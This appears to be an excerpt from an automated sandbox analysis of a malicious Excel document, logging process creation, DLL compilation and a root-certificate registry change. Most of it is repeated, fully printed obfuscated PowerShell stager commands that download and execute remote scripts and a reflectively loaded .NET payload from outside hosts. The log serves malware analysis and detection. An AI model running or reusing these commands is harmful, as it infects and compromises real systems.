        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeingJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899C022D push eax; iretd 8_2_000007FE899C0241
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899C00BD pushad ; iretd 8_2_000007FE899C00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899C2243 pushad ; ret 8_2_000007FE899C2261

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1dk2y04d\1dk2y04d.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\u10solcd\u10solcd.dllJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
